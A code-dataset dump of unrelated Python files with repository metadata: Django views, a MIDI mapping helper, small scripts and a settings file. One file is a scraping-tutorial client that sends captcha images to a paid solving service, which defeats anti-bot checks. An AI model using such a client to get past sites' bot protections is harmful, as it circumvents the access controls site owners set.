blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
added45d9f890ae16299a1fb849752c08c2c61d8
|
2e70b3ce93762c5b66fba57f8b9cba37aacf0702
|
/new/jamah/views.py
|
1f7fc766792333f3fa42f0bba092105be267c21e
|
[] |
no_license
|
mahidul-islam/jamah
|
02be511fe119e8934ec7d5aa1eaa8e2b24fad246
|
c8ddf9a8094d33e8b1d6cb834eab3d9f18b1a9ea
|
refs/heads/master
| 2022-05-13T15:11:38.609550
| 2019-06-08T04:52:09
| 2019-06-08T04:52:09
| 184,331,276
| 2
| 0
| null | 2022-04-22T21:27:18
| 2019-04-30T21:04:06
|
Python
|
UTF-8
|
Python
| false
| false
| 6,444
|
py
|
from django.shortcuts import render
from django.template import loader
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from django.contrib import messages
from .forms import JamahCreateForm
from event.forms import EventCreateForm
from .models import Jamah, JamahMember
from user.models import MyUser
from event.models import Event, EventMember
from account.models import Account
def index(request):
    """Render the jamah landing page.

    Authenticated users get a creation form plus the jamahs they created and
    the jamahs they belong to; anonymous users get an info message only.
    """
    template = loader.get_template('jamah/index.html')
    if not request.user.is_authenticated:
        messages.info(request, 'Please Log in to use this feature')
        return HttpResponse(template.render({}, request))
    # FIX: dropped the unused `all_jamah = Jamah.objects.all()` queryset and
    # the commented-out debug prints from the original.
    context = {
        'form': JamahCreateForm(),
        'jamah_by_me': Jamah.objects.filter(creator=request.user),
        'jamah_by_all': request.user.jamahs_of_you.all(),
    }
    return HttpResponse(template.render(context, request))
def detail(request, jamah_id):
    """Render the detail page for one jamah, listing its events.

    NOTE(review): `Jamah.objects.get` raises DoesNotExist (a 500) for a bad
    id — a get_object_or_404 would be friendlier; confirm desired behavior.
    """
    jamah = Jamah.objects.get(pk=jamah_id)
    # FIX: dropped the unused `jamahmembers = jamah.members.all()` local.
    context = {
        'eventForm': EventCreateForm(),
        'events': jamah.events.all(),
        'jamah': jamah,
    }
    template = loader.get_template('jamah/detail.html')
    return HttpResponse(template.render(context, request))
def alljamah(request):
    """List every jamah; anonymous visitors only get a login prompt."""
    template = loader.get_template('jamah/jamahs.html')
    if request.user.is_authenticated:
        context = {
            'form': JamahCreateForm(),
            'all_jamah': Jamah.objects.all(),
        }
    else:
        context = {}
        messages.info(request, 'Please Log in to use this feature')
    return HttpResponse(template.render(context, request))
def join_jamah(request, jamah_id):
    """Handle a user's request to join a jamah.

    If a membership record already exists, just report whether it is still
    pending; otherwise record the request on the jamah and create a pending
    JamahMember with its own Account.
    """
    jamah = Jamah.objects.get(pk=jamah_id)
    # Single combined filter instead of two chained ones; first() avoids the
    # count()-then-index double query of the original.
    existing = JamahMember.objects.filter(member=request.user, jamah=jamah).first()
    if existing is not None:
        if existing.still_to_be_excepted:  # field name (sic) kept as defined on the model
            messages.success(request, 'You already requested to join !!!')
        else:
            messages.success(request, 'You already are a Member !!!')
        return HttpResponseRedirect(reverse('jamah:all_jamah'))
    # No prior request: remember it on the jamah and create the member record.
    # m2m .add() persists immediately; the original's jamah.save() was redundant.
    jamah.requested_to_join.add(request.user)
    account = Account(description = 'Jamah: ' + jamah.jamahname + ' ' + ' ,Member: ' + request.user.username)
    account.save()
    member = JamahMember(member=request.user, jamah=jamah, status='member', account=account)
    member.save()  # BUG FIX: original assigned Model.save()'s None return to jamahMember
    messages.success(request, 'You requested to join the Group')
    return HttpResponseRedirect(reverse('jamah:all_jamah'))
def create(request):
    """Create a new jamah from POSTed 'jamahname' with the requester as creator.

    Also creates the jamah's Account, the creator's member Account, and an
    accepted ('creator') JamahMember row, then redirects to the jamah list.
    """
    name = request.POST['jamahname']
    account = Account(description = 'Jamah: ' + name + '\'s account')
    account.save()
    jamah = Jamah(jamahname = name, creator = request.user, account=account)
    jamah.save()
    # m2m .add() persists immediately; the original's extra jamah.save() was redundant.
    jamah.members.add(request.user)
    member_account = Account(description = 'Jamah: ' + name + ' ' + ' ,Member: ' + request.user.username)
    member_account.save()
    member = JamahMember(
        member = request.user,
        jamah = jamah,
        status = 'creator',
        still_to_be_excepted = False,  # creator is accepted immediately
        account = member_account,
    )
    member.save()  # BUG FIX: original assigned Model.save()'s None return to jamahMember
    return HttpResponseRedirect(reverse('jamah:all_jamah'))
def save_member(request, jamah_id, jamahmember_id):
    """Accept a pending join request: mark it accepted and move the user
    from the requested list into the member list."""
    group = Jamah.objects.get(pk=jamah_id)
    membership = JamahMember.objects.get(pk=jamahmember_id)
    membership.still_to_be_excepted = False
    group.members.add(membership.member)
    group.requested_to_join.remove(membership.member)
    membership.timestamp = timezone.now()
    group.save()
    membership.save()
    return HttpResponseRedirect(reverse('jamah:detail', args=(jamah_id,)))
def remove_member(request, jamah_id, member_id):
    """Remove a user from a jamah, deleting their membership and its account."""
    jamah = Jamah.objects.get(pk = jamah_id)
    member = MyUser.objects.get(pk = member_id)
    jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
    jamahmember.account.delete()
    jamahmember.delete()
    jamah.members.remove(member)
    # BUG FIX: the original redirected to 'event:detail' with an undefined
    # `event_id` (guaranteed NameError at runtime — copy/paste from the event
    # app). Redirect back to this jamah's detail page instead.
    return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
def promote_member(request, jamah_id, member_id):
    """Promote a jamah member one step: member -> admin -> 'modarator'."""
    jamah = Jamah.objects.get(pk = jamah_id)
    member = MyUser.objects.get(pk = member_id)
    jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
    if jamahmember.status == 'member':
        jamahmember.status = 'admin'
    elif jamahmember.status == 'admin':
        # 'modarator' (sic) kept verbatim: it must match the model's status values.
        jamahmember.status = 'modarator'
    jamahmember.save()
    # BUG FIX: the original redirected to 'event:detail' with an undefined
    # `event_id` (guaranteed NameError at runtime — copy/paste from the event
    # app). Redirect back to this jamah's detail page instead.
    return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
def create_jamah_event(request, jamah_id):
    """Create an Event under a jamah from POSTed 'name'.

    Builds the event's main and cost Accounts, the creator's member Account
    (parented to the event account), and the creator's EventMember row.
    """
    jamah = Jamah.objects.get(pk = jamah_id)
    name = request.POST['name']
    messages.success(request, 'Added a Event for the jamah...')
    account = Account(description = 'Event: ' + name + '\'s account')
    account.save()
    cost_account = Account(description = 'Event: ' + name + '\'s cost account')
    cost_account.save()
    event = Event(name = name, creator = request.user, account = account, jamah=jamah, cost_account=cost_account)
    event.save()
    # m2m .add() persists immediately; the original's extra event.save() was redundant.
    event.members.add(request.user)
    member_account = Account(description = 'Event: ' + name + ' ' + ' ,Member: ' + request.user.username)
    member_account.mother_account = event.account
    member_account.save()
    membership = EventMember(
        member = request.user,
        event = event,
        status = 'creator',
        accountant_account = member_account,
        is_accountant = True,
        is_head_accountant = True,
        is_cost_observer = True,
    )
    membership.save()  # BUG FIX: original assigned Model.save()'s None return to eventMember
    return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
|
[
"mizihan84@gmail.com"
] |
mizihan84@gmail.com
|
049aca3df698e02af2e577d8085b003078f81c03
|
187af52e7f5150a5341aaf0c245baefa5e44d2e0
|
/爬虫/第八章/3.点触验证码的识别/captach.py
|
713d7a21412eef592285e25417c0dcf1c2c798b6
|
[] |
no_license
|
ShaoLay/Python_PaChong
|
ea9bc3880daf5d775f214017184d70a63cd1130a
|
97db513ee07a14e07afa785628864d46cdb9ad03
|
refs/heads/master
| 2020-04-07T16:58:29.916471
| 2018-12-17T07:02:12
| 2018-12-17T07:02:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,389
|
py
|
import requests
from hashlib import md5
class Chaojiying(object):
    """Minimal HTTP client for the chaojiying.com captcha-solving service."""

    def __init__(self, username, password, soft_id):
        self.username = username
        # The API expects the MD5 hex digest of the password, not the plaintext.
        self.password = md5(password.encode('utf-8')).hexdigest()
        self.soft_id = soft_id
        self.base_params = {
            'user': self.username,
            'pass2': self.password,
            'softid': self.soft_id,
        }
        self.headers = {
            'Connection': 'Keep-Alive',
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
        }

    def post_pic(self, im, codetype):
        """Submit image bytes `im` for solving.

        `codetype` selects the puzzle category — see
        http://www.chaojiying.com/price.html for the catalogue.
        """
        payload = dict(self.base_params)
        payload['codetype'] = codetype
        files = {'userfile': ('ccc.jpg', im)}
        response = requests.post('http://upload.chaojiying.net/Upload/Processing.php',
                                 data=payload, files=files, headers=self.headers)
        return response.json()

    def report_error(self, im_id):
        """Report a wrongly solved captcha by its image id `im_id`."""
        payload = dict(self.base_params)
        payload['id'] = im_id
        response = requests.post('http://upload.chaojiying.net/Upload/ReportError.php',
                                 data=payload, headers=self.headers)
        return response.json()
|
[
"javs_shao@163.com"
] |
javs_shao@163.com
|
0fafd36ef08142b623213dd91d2bc34c83e31bda
|
0191d4695198ecc61ef9f599c07b3372e7ff10b8
|
/album/views.py
|
7ef7db17cbee57b293dad8a4b3bbbe31fc1e1298
|
[] |
no_license
|
caioaraujo/discoteka
|
f22ba641e57b40da2dd08ec1f6c4925699a7d89b
|
a44ffbe23ce1b36bcc8ad1287db3de13e995705a
|
refs/heads/master
| 2021-01-20T00:36:47.631669
| 2017-05-06T14:34:20
| 2017-05-06T14:34:20
| 89,159,473
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,132
|
py
|
from rest_framework.response import Response
from rest_framework.views import APIView
from album.models import Album as AlbumModel
from album.serializers import AlbumSerializer
from artista.models import Artista as ArtistaModel
from discoteka.exceptions import RegistroNaoEncontradoException, ValorObrigatorioException
class Album(APIView):
    """REST endpoint for creating (POST) and listing (GET) albums."""

    def post(self, request):
        # Validate required fields and the referenced artist before saving.
        data = request.data
        self.valida_preenchimento(data)
        artista_id = data.get('artista')
        self.valida_artista(artista_id)
        album = AlbumModel()
        album.nome = data.get('nome')
        album.artista_id = data.get('artista')
        album.ano_lancamento = data.get('ano_lancamento')
        album.faixas = data.get('faixas')
        album.save()
        serializer = AlbumSerializer(album)
        return Response(serializer.data)

    def get(self, request):
        # List albums filtered by the 'artista' query parameter.
        albuns = AlbumModel.objects.filter(artista_id=request.GET.get('artista')).all()
        serializer = AlbumSerializer(albuns, many=True)
        return Response(serializer.data)

    def valida_artista(self, artista_id):
        # Raise if the artist id does not resolve to an existing record.
        artista = ArtistaModel.get_artista_por_id(pk=artista_id)
        if not artista:
            raise RegistroNaoEncontradoException("Artista %s não encontrado" % artista_id)

    def valida_preenchimento(self, dados):
        # Each required field raises its own "is mandatory" error when missing
        # or falsy (note: a 0 value would also be rejected here).
        if not dados.get('artista'):
            raise ValorObrigatorioException('Artista é obrigatório')
        if not dados.get('nome'):
            raise ValorObrigatorioException('Nome do álbum é obrigatório')
        if not dados.get('ano_lancamento'):
            raise ValorObrigatorioException('Ano de lançamento é obrigatório')
        if not dados.get('faixas'):
            raise ValorObrigatorioException('Nr. de faixas é obrigatório')
class AlbumId(APIView):
    """REST endpoint for operations on a single album by primary key."""

    def delete(self, request, pk):
        """Delete album `pk`; raise if no such record exists."""
        registro = AlbumModel.get_album_por_id(pk=pk)
        if not registro:
            raise RegistroNaoEncontradoException("Álbum não encontrado")
        registro.delete()
        return Response({'message': 'Álbum removido com sucesso'}, content_type='application/json')
|
[
"c.felipe.araujo@gmail.com"
] |
c.felipe.araujo@gmail.com
|
384d1fd0f22eeef5459a04938bae73d253c4151e
|
5a017fc861db92e3a2919f260d54f1301afbb3e5
|
/MIDI Remote Scripts/_Framework/MidiMap.py
|
815ac4dd8f4cd29c3396fee38203738716dd33b9
|
[] |
no_license
|
kera67/livepy_diff_ten
|
8d8d0f3b76048f1fe5d4c0fbc02549dc922c7d5b
|
12a0af9e9c57d0721af5036ce23af549df2c95f0
|
refs/heads/master
| 2023-07-14T18:26:33.591915
| 2020-11-19T07:50:28
| 2020-11-19T07:50:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,626
|
py
|
from __future__ import absolute_import, print_function, unicode_literals
import Live
from .ButtonMatrixElement import ButtonMatrixElement
from .ButtonElement import ButtonElement
from .EncoderElement import EncoderElement
from .SliderElement import SliderElement
def make_button(name, channel, number, midi_message_type):
    """Build a named, non-momentary (toggle-style) ButtonElement."""
    is_momentary = False  # the original spelled this as `not True`
    return ButtonElement(is_momentary, midi_message_type, channel, number, name=name)
def make_slider(name, channel, number, midi_message_type):
    # Thin factory: a named SliderElement on the given MIDI channel/number.
    return SliderElement(midi_message_type, channel, number, name=name)
def make_encoder(name, channel, number, midi_message_type):
    # Thin factory: a named absolute-mode EncoderElement.
    return EncoderElement(midi_message_type, channel, number, Live.MidiMap.MapMode.absolute, name=name)
class MidiMap(dict):
    """Name -> control-element mapping with uniqueness-checked registration."""

    def add_button(self, name, channel, number, midi_message_type):
        # Register one named button; a duplicate name is a programming error.
        assert name not in self.keys()
        self[name] = make_button(name, channel, number, midi_message_type)

    def add_matrix(self, name, element_factory, channel, numbers, midi_message_type):
        # Build a matrix of elements from `numbers`, a sequence of rows of MIDI
        # identifiers. Element names are "name[x]" when there is a single row,
        # "name[x,y]" otherwise.
        assert name not in self.keys()

        def one_dimensional_name(base_name, x, _y):
            return u'%s[%d]' % (base_name, x)

        def two_dimensional_name(base_name, x, y):
            return u'%s[%d,%d]' % (base_name, x, y)

        name_factory = two_dimensional_name if len(numbers) > 1 else one_dimensional_name
        # Row-major: outer loop over rows of identifiers, inner over columns.
        elements = [ [ element_factory(name_factory(name, column, row), channel, identifier, midi_message_type) for column, identifier in enumerate(identifiers) ] for row, identifiers in enumerate(numbers) ]
        self[name] = ButtonMatrixElement(rows=elements)
|
[
"aumhaa@gmail.com"
] |
aumhaa@gmail.com
|
1b06f8f93e9915353990e1e374d47340e80aacab
|
c3e70e85773da05cdf7375d34ebcb3a5560aaa9f
|
/Greedy/CodingTest_ver3/볼링공_고르기.py
|
72a0ff9cc7e747edef4da3aec8ddef01c5732e23
|
[] |
no_license
|
hongyeon-kyeong/Algorithm
|
5409f0472bd409b957f390b6adae0c67976dda85
|
def11fd33f286013837317968991e6b87cc643c3
|
refs/heads/main
| 2023-04-01T13:43:35.982871
| 2021-03-23T12:20:20
| 2021-03-23T12:20:20
| 318,711,413
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 247
|
py
|
# Bowling-ball pairing: count unordered pairs of balls with different weights.
# Input line 1: "n m" (number of balls, maximum weight); line 2: n weights in 1..m.
n, m = map(int, input().split())
data = list(map(int, input().split()))

# weights[w] = number of balls of weight w.
# BUG FIX: sized by m (the maximum possible weight), not n — the original
# `[0] * (n+1)` raises IndexError whenever m > n.
weights = [0] * (m + 1)
for w in data:
    weights[w] += 1

count = 0
remaining = n  # balls with weight strictly greater than the current w
for w in range(1, m + 1):
    remaining -= weights[w]
    # Pair every weight-w ball with every strictly heavier ball; this counts
    # each mixed-weight pair exactly once.
    count += (weights[w] * remaining)
print(count)
|
[
"hyjykelly@gmail.com"
] |
hyjykelly@gmail.com
|
2dcca14dad5d66de58e425dcc274f0f0a2df7e22
|
f4f0b7feb71ba719b373735bc39efb2ebcdddcd8
|
/solution/ourFeature/pre.py
|
a09d54d5798f50e05dcbb9afe0a3cb80329aa5e7
|
[] |
no_license
|
fuhailin/2018-Big-Data-Challenge
|
112ef765e9866f1b6e521711100aff871d66cb27
|
419db72e110079f208197e9bd8dee0991a72f5a1
|
refs/heads/master
| 2020-03-20T03:59:15.308366
| 2018-06-26T15:01:50
| 2018-06-26T15:01:50
| 137,166,621
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,778
|
py
|
"""
author: yang yiqing
comment: 数据预处理
date: 2018年06月16日16:32:00
"""
import pandas as pd
import numpy as np
def split_data(action, launch, register, video):
    """Slice the four activity logs into rolling time windows and save each slice.

    Relies on the module-level Num_dataSet, start_date_list and end_date_list
    (assigned in the __main__ block — TODO confirm this is always run as a
    script). For each window [start_date, end_date] it writes the windowed
    logs plus a label frame marking users active in the following 7 days.
    """
    print('split data...')
    for i in range(Num_dataSet):
        start_date = start_date_list[i]
        end_date = end_date_list[i]
        # Restrict every log to the feature window [start_date, end_date].
        temp_action = action[(action.day >= start_date) & (action.day <= end_date)]
        temp_launch = launch[(launch.day >= start_date) & (launch.day <= end_date)]
        temp_register = register[(register.day >= start_date) & (register.day <= end_date)]
        temp_video = video[(video.day >= start_date) & (video.day <= end_date)]
        # Users seen in any log during the feature window.
        temp_all_user = np.unique(
            temp_action['user_id'].tolist() + temp_register['user_id'].tolist() + temp_launch['user_id'].tolist() +
            temp_video['user_id'].tolist())
        # Users active in any log during the 7 days after the window: label 1.
        temp_label_user = np.unique(
            action[(action.day > end_date) & (action.day <= end_date + 7)]['user_id'].tolist() +
            launch[(launch.day > end_date) & (launch.day <= end_date + 7)]['user_id'].tolist() +
            register[(register.day > end_date) & (register.day <= end_date + 7)]['user_id'].tolist() +
            video[(video.day > end_date) & (video.day <= end_date + 7)]['user_id'].tolist())
        # get label
        temp_DF = get_label(temp_all_user, temp_label_user)
        # save file
        # temp_DF holds user_id and label; the other log files can be
        # left-merged onto it via user_id.
        temp_DF.to_csv('splited_date/df_%d_%d.csv' % (start_date, end_date))
        temp_action.to_csv('splited_date/action_%d_%d.csv' % (start_date, end_date))
        temp_launch.to_csv('splited_date/launch_%d_%d.csv' % (start_date, end_date))
        temp_register.to_csv('splited_date/register_%d_%d.csv' % (start_date, end_date))
        temp_video.to_csv('splited_date/video_%d_%d.csv' % (start_date, end_date))
def get_label(all_user, label_user):
    """Build a DataFrame with one row per user and a 0/1 activity label.

    Parameters
    ----------
    all_user : sequence of user ids observed in the feature window.
    label_user : sequence of user ids active in the label window.

    Returns
    -------
    pd.DataFrame with columns 'user_id' and int 'label'
    (label is 1 iff the user appears in label_user).
    """
    print('get label...')
    print(len(all_user))
    # labels are all zero for the test set (empty label_user)
    print(len(label_user))
    df = pd.DataFrame()
    df['user_id'] = all_user
    # PERF FIX: O(1) membership via a set — the original `in label_user`
    # scanned the array per user, making labeling O(len(all_user) * len(label_user)).
    positives = set(label_user)
    df['label'] = [1 if u in positives else 0 for u in all_user]
    df['label'] = df['label'].astype(int)
    return df
if __name__ == '__main__':
    # To change the time windows, only the parameters below need editing.
    Num_dataSet = 3
    start_date_list = [1, 8, 15]
    end_date_list = [16, 23, 30]
    # read data (index_col=0 drops the unnamed index column written by to_csv)
    action = pd.read_csv('data/action.csv', index_col=0)
    launch = pd.read_csv('data/launcher.csv', index_col=0)
    register = pd.read_csv('data/register.csv', index_col=0)
    video = pd.read_csv('data/video.csv', index_col=0)
    split_data(action, launch, register, video)
|
[
"hailinfufu@outlook.com"
] |
hailinfufu@outlook.com
|
e50058dbb805fd455badad57c4025ef3de68f4d1
|
cd594b9a01ca5a587c0d30c9b41fa099af93f98e
|
/books/orders/urls.py
|
30c514984788da44c258b8c65bb0ef4be70779ed
|
[] |
no_license
|
raj713335/Django_Professional
|
54bf628aa75d81ef2266d6a0c6b53d1705744f3d
|
96daff2dc38cda21aa9683ca0b023cd55705323f
|
refs/heads/master
| 2023-02-07T17:04:11.668927
| 2020-12-30T11:11:23
| 2020-12-30T11:11:23
| 324,566,618
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
# orders/urls.py
# Routes for the orders app: the payment-charge endpoint and the order list.
from django.urls import path
from .views import OrdersPageView, charge
urlpatterns = [
    path('charge/', charge, name='charge'),
    path('', OrdersPageView.as_view(), name='orders'),
]
|
[
"raj713335@gmail.com"
] |
raj713335@gmail.com
|
56a56c8ead80145924257961f4a0b23562f2d0d9
|
014e4be9addc57eb5599086dc82ba431ed406e81
|
/Lesson_2/HW_2/test_file.py
|
b0e024eeb7ef334a196097e664b346ae69432e64
|
[] |
no_license
|
ZakirovRail/back_end
|
a4f20c099562f901bb107c8e7b333c890cd7995f
|
0a03ef5d3283b7a6d22e1848ae8c55c4caef8010
|
refs/heads/main
| 2023-03-31T00:25:06.568394
| 2021-03-23T07:44:42
| 2021-03-23T07:44:42
| 334,494,409
| 0
| 0
| null | 2021-03-11T12:13:36
| 2021-01-30T19:27:57
|
Python
|
UTF-8
|
Python
| false
| false
| 808
|
py
|
import csv
data_to_export = [['Изготовитель системы', 'Название ОС', 'Код продукта', 'Тип системы'], ['LENOVO', 'ACER', 'DELL'], ['Microsoft Windows 7 Профессиональная', 'Microsoft Windows 10 Professional', 'Microsoft Windows 8.1 Professional'], ['00971-OEM-1982661-00231', '00971-OEM-1982661-00231', '00971-OEM-1982661-00231'], ['x64-based PC', 'x64-based PC', 'x86-based PC']]
def write_to_csv(rows):
    """Write `rows` to task_1.csv, quoting every non-numeric field.

    BUG FIX: the original ignored its argument entirely (it iterated the
    module-level data_to_export instead) and named its parameter `list`,
    shadowing the builtin.
    """
    # newline='' lets the csv module control row endings, preventing the
    # doubled \r\r\n rows that text-mode writing produces on Windows.
    with open('task_1.csv', 'w', newline='') as file:
        fn_write = csv.writer(file, quoting=csv.QUOTE_NONNUMERIC)
        for row in rows:
            fn_write.writerow(row)
# Export the sample system-info table defined above.
write_to_csv(data_to_export)
# with open('lesson_csv.csv', 'w') as fn:
#     fn_write = csv.writer(fn)
#     for row in data:
#         fn_write.writerow(row)
|
[
"rjzakirov@gmail.com"
] |
rjzakirov@gmail.com
|
21edcbda377b2af56762d1185106281cd740f5c3
|
d8641ab3265371b9926222a80b93e039a96acd36
|
/chapter_15/styleChage.py
|
c65955ed2b01950d7e2e3a0e921769cdf3408258
|
[] |
no_license
|
fahimkk/automateTheBoringStuff
|
af2256f10c8c4ea156e003291a6a309c2ae8dc7d
|
6022f2dd4381a378fe360696b6a9f44cd77f873d
|
refs/heads/master
| 2022-12-08T20:52:25.400695
| 2020-09-05T10:43:09
| 2020-09-05T10:43:09
| 284,317,477
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
# Restyle demo.docx with python-docx: reset paragraph 0 to the 'Normal'
# paragraph style, apply the 'QuoteChar' character style to the first run of
# paragraph 1, underline its next two runs, and save as restyled.docx.
import docx
import logging
logging.basicConfig(level=logging.DEBUG)
doc = docx.Document('demo.docx')
logging.debug(doc.paragraphs[0].text)
doc.paragraphs[0].style = 'Normal'
# Runs are styled individually; paragraph style vs run (character) style differ.
doc.paragraphs[1].runs[0].style = 'QuoteChar'
logging.debug(doc.paragraphs[1].runs[0].text)
doc.paragraphs[1].runs[1].underline = True
logging.debug(doc.paragraphs[1].runs[1].text)
doc.paragraphs[1].runs[2].underline = True
logging.debug(doc.paragraphs[1].runs[2].text)
doc.save('restyled.docx')
|
[
"fahimasharafkk@gmail.com"
] |
fahimasharafkk@gmail.com
|
650a8a893c1dcebd6bb63eb7ae18ee8468bf566d
|
3c1e51cdc1e8fe95cd1dc9674954622b7ee1e71a
|
/backend/mobilegeee_28456/settings.py
|
60372fff369e36c9a4d533d7b555077d3c91e624
|
[] |
no_license
|
crowdbotics-apps/mobilegeee-28456
|
ed22c9fd3008f73442bee4af7fed0887a5ae436d
|
dedcfddd27f9707bfc584f602341cc32d2e79034
|
refs/heads/master
| 2023-06-09T02:30:41.908432
| 2021-07-05T13:52:25
| 2021-07-05T13:52:25
| 383,155,833
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,114
|
py
|
"""
Django settings for mobilegeee_28456 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mobilegeee_28456.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mobilegeee_28456.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
